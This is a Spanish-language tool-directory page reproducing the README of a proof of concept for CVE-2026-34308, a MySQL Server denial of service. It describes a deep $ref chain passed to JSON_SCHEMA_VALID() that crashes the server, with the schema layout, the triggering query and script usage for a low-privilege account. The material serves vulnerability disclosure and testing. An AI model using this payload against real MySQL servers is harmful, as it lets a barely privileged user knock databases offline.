Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-34308 — Prueba de concepto para CVE-2026-34308, una vulnerabilidad de denegación de servicio en el componente JSON de MySQL Server. Demuestra el agotamiento de la pila mediante cadenas profundas de $ref en JSON_SCHEMA_VALID(), provocando el bloqueo del servidor. Incluye script PoC en Python y análisis técnico. | Kitploit
Herramientas/GitHubGitHub/joakimbulow/cve-2026-34308
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad de Bases de Datos
GitHubjoakimbulow/cve-2026-34308

CVE-2026-34308

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Prueba de concepto para CVE-2026-34308, una vulnerabilidad de denegación de servicio en el componente JSON de MySQL Server. Demuestra el agotamiento de la pila mediante cadenas profundas de $ref en JSON_SCHEMA_VALID(), provocando el bloqueo del servidor. Incluye script PoC en Python y análisis técnico.

Compartir

CVE-2026-34308: Denegación de servicio en MySQL Server (componente JSON)

Boletín oficial del proveedor: Oracle Critical Patch Update Advisory — April 2026.

Resumen (según el CVE publicado)

Vulnerabilidad en Oracle MySQL Server (componente: Server: JSON).

Versiones afectadas compatibles: 8.0.0–8.0.45, 8.4.0–8.4.8 y 9.0.0–9.6.0.

La vulnerabilidad permite que un usuario con privilegios bajos provoque un bloqueo del MySQL Server.

Puntuación base CVSS 3.1: 6.5 (solo afecta a la disponibilidad)
Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H


Análisis técnico adicional (no forma parte del texto del CVE)

Mecanismo observado: Recursión profunda cuando MySQL evalúa JSON_SCHEMA_VALID() contra un JSON Schema que contiene una larga cadena lineal de punteros $ref, sin un límite de profundidad efectivo durante la compilación/validación del esquema, lo que provoca el agotamiento de la pila y un cuelgue o un bloqueo repetible.

Cadena de llamadas (conceptual):

root@kitploit:~
Client SQL → JSON_SCHEMA_VALID(schema, instance)
  → validación interna del JSON schema → resolución repetida de $ref
  → agotamiento de la pila → cuelgue / bloqueo

Privilegios necesarios

Para este PoC, cualquier cuenta MySQL autenticada es suficiente: basta con otorgar solo USAGE sobre *.* (el privilegio mínimo de MySQL —capacidad de conexión— sin SELECT, acceso a tablas ni roles de administrador). Si el usuario puede abrir una sesión y ejecutar SELECT JSON_SCHEMA_VALID(...), puede desencadenar la condición.


Prueba de concepto

Script PoC: poc_schema_dos.py

Construye un JSON schema con una cadena lineal de $ref (profundidad de ejemplo 1200):

root@kitploit:~
{
  "$ref": "#/definitions/l0",
  "definitions": {
    "l0": {"$ref": "#/definitions/l1"},
    "l1": {"$ref": "#/definitions/l2"},
    ...
    "l1200": {"type": "string"}
  }
}

Enviado a MySQL como: SELECT JSON_SCHEMA_VALID('<schema>', '"x"');

En pruebas contra versiones vulnerables, se ha observado que bloquea el servidor en aproximadamente un segundo (el tiempo exacto depende del hardware, las opciones de compilación y la profundidad del esquema).

Uso

root@kitploit:~
python3 poc_schema_dos.py --host 127.0.0.1 --port 3306 --user root --password ""

Para probar una cuenta con privilegios bajos:

root@kitploit:~
CREATE USER 'test'@'%' IDENTIFIED BY 'password';
GRANT USAGE ON *.* TO 'test'@'%';
FLUSH PRIVILEGES;

Después: python3 poc_schema_dos.py --user test --password password


CVSS v3.1 (vector oficial)

6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

  • AV:N: Accesible desde la red
  • AC:L: Complejidad de ataque baja
  • PR:L: Se requieren privilegios bajos
  • UI:N: Sin interacción del usuario
  • S:U: Alcance sin cambios
  • C:N / I:N: Sin impacto en la confidencialidad ni la integridad
  • A:H: Alto impacto en la disponibilidad (cuelgue / bloqueo repetible / DoS)

Archivos

  • poc_schema_dos.py: Script de prueba de concepto
  • README.md: Este archivo
Descargar herramienta